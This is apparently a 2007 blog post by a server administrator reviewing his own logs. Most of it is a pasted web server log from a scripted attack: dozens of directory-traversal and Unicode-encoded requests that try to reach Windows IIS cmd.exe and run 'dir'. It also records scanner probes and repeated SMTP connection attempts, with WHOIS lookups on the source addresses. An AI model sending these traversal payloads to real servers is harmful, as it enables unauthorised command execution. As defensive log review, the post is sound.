Posted on

Who says Windows is secure….

Though surely just a script and a lot of attempts to hack into a windows system, this is what I found in last week’s webserver log:
222.189.7.29 - - [13/Feb/2007:07:25:54 +0100] "GET /cgi-bin/query/scripts/..%5c%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 815
222.189.7.29 - - [13/Feb/2007:07:25:55 +0100] "GET /cgi-bin/query/scripts/root.exe?/c+dir HTTP/1.0" 404 782
222.189.7.29 - - [13/Feb/2007:07:25:59 +0100] "GET /cgi-bin/query/msadc/..À/..À/..À/../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 809
222.189.7.29 - - [13/Feb/2007:07:26:00 +0100] "GET /cgi-bin/query/msadc/..À/../..À/../..À/../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 815
222.189.7.29 - - [13/Feb/2007:07:26:01 +0100] "GET /cgi-bin/query/msadc/..À¯..À¯..À¯../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 809
222.189.7.29 - - [13/Feb/2007:07:26:05 +0100] "GET /cgi-bin/query/msadc/..À¯../..À¯../..À¯../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 815
222.189.7.29 - - [13/Feb/2007:07:26:06 +0100] "GET /msadc/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir" 403 671
222.189.7.29 - - [13/Feb/2007:07:26:07 +0100] "GET /msadc/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir" 403 671
222.189.7.29 - - [13/Feb/2007:07:26:08 +0100] "GET /msadc/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir" 403 671
222.189.7.29 - - [13/Feb/2007:07:26:08 +0100] "GET /msadc/..%c1%9f../..%c1%9f../..%c1%9f../winnt/system32/cmd.exe?/c+dir" 403 671
222.189.7.29 - - [13/Feb/2007:07:26:09 +0100] "GET /cgi-bin/query/scripts/..À/..À/..À/..À/../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 815
222.189.7.29 - - [13/Feb/2007:07:26:10 +0100] "GET /cgi-bin/query/scripts/..À/../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 803
222.189.7.29 - - [13/Feb/2007:07:26:11 +0100] "GET /cgi-bin/query/scripts/..À¯..À¯..À¯..À¯../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 815
222.189.7.29 - - [13/Feb/2007:07:26:12 +0100] "GET /cgi-bin/query/scripts/..À¯../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 803
222.189.7.29 - - [13/Feb/2007:07:26:13 +0100] "GET /scripts/..%c1%1c..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir" 403 671
222.189.7.29 - - [13/Feb/2007:07:26:14 +0100] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir" 403 671
222.189.7.29 - - [13/Feb/2007:07:26:17 +0100] "GET /scripts/..%c1%9c..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir" 403 671
222.189.7.29 - - [13/Feb/2007:07:26:18 +0100] "GET /scripts/..%c1%9f../winnt/system32/cmd.exe?/c+dir" 403 671
222.189.7.29 - - [13/Feb/2007:07:26:19 +0100] "GET /cgi-bin/query/scripts/../../../../../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 811
222.189.7.29 - - [13/Feb/2007:07:26:20 +0100] "GET /cgi-bin/query/scripts/../../cmd.exe?/c+dir HTTP/1.0" 404 787
222.189.7.29 - - [13/Feb/2007:07:26:21 +0100] "GET /cgi-bin/query/scripts/../../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 802
222.189.7.29 - - [13/Feb/2007:07:26:22 +0100] "GET /cgi-bin/query/scripts/..?../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 776
222.189.7.29 - - [13/Feb/2007:07:26:23 +0100] "GET /cgi-bin/query/scripts/..?..?..?..?../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 776
222.189.7.29 - - [13/Feb/2007:07:26:24 +0100] "GET /cgi-bin/query/scripts/.._../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 802
222.189.7.29 - - [13/Feb/2007:07:26:24 +0100] "GET /cgi-bin/query/scripts/../../../../../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 811
222.189.7.29 - - [13/Feb/2007:07:26:25 +0100] "GET /cgi-bin/query/scripts/../../cmd.exe?/c+dir HTTP/1.0" 404 787
222.189.7.29 - - [13/Feb/2007:07:26:26 +0100] "GET /cgi-bin/query/scripts/../../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 802
222.189.7.29 - - [13/Feb/2007:07:26:27 +0100] "GET /cgi-bin/query/scripts/..?../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 776
222.189.7.29 - - [13/Feb/2007:07:26:28 +0100] "GET /cgi-bin/query/scripts/..?..?..?..?../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 776
222.189.7.29 - - [13/Feb/2007:07:26:29 +0100] "GET /cgi-bin/query/scripts/.._../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 802
222.189.7.29 - - [13/Feb/2007:07:26:30 +0100] "GET /cgi-bin/query/scripts/cmd.exe?/c+dir HTTP/1.0" 404 781
222.189.7.29 - - [13/Feb/2007:07:26:31 +0100] "GET /scripts/cmd32.exe" 404 675
222.189.7.29 - - [13/Feb/2007:07:26:32 +0100] "GET /cgi-bin/query/scripts/cmd32.exe?/c+dir HTTP/1.0" 404 783
222.189.7.29 - - [13/Feb/2007:07:26:33 +0100] "GET /cgi-bin/query/msadc/..?../..?../..?../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 774
222.189.7.29 - - [13/Feb/2007:07:26:33 +0100] "GET /cgi-bin/query/msadc/..?..?..?../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 774
222.189.7.29 - - [13/Feb/2007:07:26:34 +0100] "GET /cgi-bin/query/msadc/.._../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 800
222.189.7.29 - - [13/Feb/2007:07:26:35 +0100] "GET /cgi-bin/query/script/.._../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 801
222.189.7.29 - - [13/Feb/2007:07:26:36 +0100] "GET /cgi-bin/query/_mem_bin/..À/..À/..À/../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 812
222.189.7.29 - - [13/Feb/2007:07:26:37 +0100] "GET /cgi-bin/query/_mem_bin/..À¯..À¯..À¯../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 812
222.189.7.29 - - [13/Feb/2007:07:26:38 +0100] "GET /_mem_bin/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir" 403 671
222.189.7.29 - - [13/Feb/2007:07:26:39 +0100] "GET /_mem_bin/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir" 403 671
222.189.7.29 - - [13/Feb/2007:07:26:43 +0100] "GET /cgi-bin/query/_mem_bin/../../../../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 809
222.189.7.29 - - [13/Feb/2007:07:26:43 +0100] "GET /cgi-bin/query/_mem_bin/..?..?..?../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 777
222.189.7.29 - - [13/Feb/2007:07:26:44 +0100] "GET /cgi-bin/query/_mem_bin/.._../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 803
222.189.7.29 - - [13/Feb/2007:07:26:45 +0100] "GET /cgi-bin/query/_vti_bin/..À/..À/..À/../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 812
222.189.7.29 - - [13/Feb/2007:07:26:49 +0100] "GET /cgi-bin/query/_vti_bin/..À¯..À¯..À¯../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 812
222.189.7.29 - - [13/Feb/2007:07:26:50 +0100] "GET /_vti_bin/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir" 403 671
222.189.7.29 - - [13/Feb/2007:07:26:51 +0100] "GET /_vti_bin/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir" 403 671
222.189.7.29 - - [13/Feb/2007:07:26:51 +0100] "GET /cgi-bin/query/_vti_bin/../../../../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 809
222.189.7.29 - - [13/Feb/2007:07:26:52 +0100] "GET /cgi-bin/query/_vti_bin/..?..?..?../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 777
222.189.7.29 - - [13/Feb/2007:07:26:53 +0100] "GET /cgi-bin/query/_vti_bin/.._../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 803
222.189.7.29 - - [13/Feb/2007:07:26:54 +0100] "GET /cgi-bin/query/bin/scripts/../../../../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 812
222.189.7.29 - - [13/Feb/2007:07:26:55 +0100] "GET /cgi-bin/query/bin/scripts/..?..?..?../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 780
222.189.7.29 - - [13/Feb/2007:07:26:56 +0100] "GET /cgi-bin/query/bin/scripts/.._../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 806
222.189.7.29 - - [13/Feb/2007:07:26:57 +0100] "GET /cgi-bin/..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe?/c+dir" 404 675
222.189.7.29 - - [13/Feb/2007:07:26:58 +0100] "GET /cgi-bin/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir" 404 675
222.189.7.29 - - [13/Feb/2007:07:26:58 +0100] "GET /cgi-bin/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir" 404 675
222.189.7.29 - - [13/Feb/2007:07:26:59 +0100] "GET /cgi-bin/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir" 404 675
222.189.7.29 - - [13/Feb/2007:07:27:00 +0100] "GET /cgi-bin/../../../../winnt/system32/cmd.exe?/c+dir" 404 675
222.189.7.29 - - [13/Feb/2007:07:27:03 +0100] "GET /cgi-bin/..?..?..?../winnt/system32/cmd.exe?/c+dir" 404 675
222.189.7.29 - - [13/Feb/2007:07:27:04 +0100] "GET /cgi-bin/.._../winnt/system32/cmd.exe?/c+dir" 404 675
222.189.7.29 - - [13/Feb/2007:07:27:05 +0100] "GET /cgi-Bin/cmd.exe?/c+dir" 404 675
222.189.7.29 - - [13/Feb/2007:07:27:06 +0100] "GET /cgi-bin/cmd.exe?/c+dir" 404 675
222.189.7.29 - - [13/Feb/2007:07:27:07 +0100] "GET /Cgi-Bin/cmd32.exe?/c+dir" 404 675
222.189.7.29 - - [13/Feb/2007:07:27:07 +0100] "GET /Cgi-Bin/cmd32.exe?/c+dir" 404 675
Clearly someone who’s running a script, and I severely doubt his knowlegde…..Just trying to see if he can get in. Or espionage? The address is said to be located in China:

inetnum: 222.184.0.0 - 222.191.255.255
netname: CHINANET-JS
descr: CHINANET jiangsu province network
descr: China Telecom
descr: A12,Xin-Jie-Kou-Wai Street
descr: Beijing 100088
country: CN
admin-c: CH93-AP
tech-c: CJ186-AP
mnt-by: APNIC-HM
mnt-lower: MAINT-CHINANET-JS
mnt-routes: MAINT-CHINANET-JS

Apart from this, just a few that appear quite regularly:

69.84.207.37 – – [12/Feb/2007:07:02:35 +0100] “GET /No%0Ate-email.htm HTTP/1.1” 403 864
69.84.207.37 – – [12/Feb/2007:07:06:27 +0100] “GET /cgi-bin/count.exe HTTP/1.1” 502 900
69.84.207.37 – – [12/Feb/2007:07:06:28 +0100] “GET /cgi-bin/c%0Aount.exe HTTP/1.1” 404 887
207.234.131.90 – – [12/Feb/2007:09:56:37 +0100] “GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1” 400 893

These are just a few of these, not a lot in a week.
Mail
Someone is trying to blow the SMTP server – for over 24 hours up to now:
%%%%%%%%%%% OPCOM 18-FEB-2007 14:46:13.71 %%%%%%%%%%%
Message from user INTERnet on DIANA
INTERnet ACP SMTP Accept Request from Host: 84.246.98.2 Port: 4977

%%%%%%%%%%% OPCOM 18-FEB-2007 14:46:13.92 %%%%%%%%%%%
Message from user TCPIP$SMTP on DIANA
%TCPIP-W-SMTP_UNBKTRNSIP, client IP address 84.246.98.2 is not backtranslatable
...
%%%%%%%%%%% OPCOM 19-FEB-2007 22:50:57.98 %%%%%%%%%%%
Message from user INTERnet on DIANA
INTERnet ACP SMTP Accept Request from Host: 84.246.98.2 Port: 4144

%%%%%%%%%%% OPCOM 19-FEB-2007 22:50:58.15 %%%%%%%%%%%
Message from user TCPIP$SMTP on DIANA
%TCPIP-W-SMTP_UNBKTRNSIP, client IP address 84.246.98.2 is not backtranslatable
to a host name

I haven’t count the entries, but the attempts occur each 2 minutes or so. Alas, the router has no ability to block him there…
This address is a UK one:
inetnum: 84.246.96.0 - 84.246.103.255
netname: UK-WH-UK-20040830
descr: World Hub Limited
descr: PROVIDER Local Registry
country: GB # US
org: ORG-WHL1-RIPE
admin-c: DA1277-RIPE
tech-c: DA1277-RIPE
status: ALLOCATED PA
mnt-by: RIPE-NCC-HM-MNT
mnt-lower: worldhub-ip
mnt-routes: worldhub-ip
source: RIPE # Filtered

Both ISP’s will be informed.

Posted on

19-Feb-2007

Quiet on all fronts
that is: nothing but the usual to be done. I still have to process the FTP logs, but it will be part of the full overhaul of the whole site. I think I’ll use another program as a portal, another PHP-based program including forums (Phorum, as used by OpenVMS.org, is currently under investigation) of perhaps even domething I create myself.
Stay tuned….
Windows woes
The problems with updates on Aphrodite have not been solved. Thou the system states that updates are actuallay installed, some show up time after time again and need to be manually hidden to show up. I’m not sure Microsoft is really investigating….
PHP woes
Once in a while, the PHP engine breaks and the server will complain it doesn’t get a valid response. This applies to both the blog and forums, message like this occur in the webserver logs:
%HTTPD-W-NOTICED, 17-FEB-2007 16:34:52, CGI:1969, not a strict CGI response
-NOTICED-I-SERVICE, http://www.grootersnet.nl:80
-NOTICED-I-CLIENT, 213.84.186.159
-NOTICED-I-URI, GET (66 bytes) /forums/login.php?logout=true&sid=4e53a23d769172fb7e0d205a5106e3ac
-NOTICED-I-SCRIPT, /forums/login.php forums:[000000]login.php (cgi_exe:phpwasd.exe) FORUMS:[000000]login.php
-NOTICED-I-CGI, xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx (129 bytes) %SYSTEM-F-HPARITH, high performance arithmetic trap, Imask=00000000, Fmask=00000002, summary=02, PC=00000000001E9C94, PS=0000001B
-NOTICED-I-RXTX, err:0/0 raw:708/0 net:708/0
I found the

    only

solution seems to be; restart the webbrowser…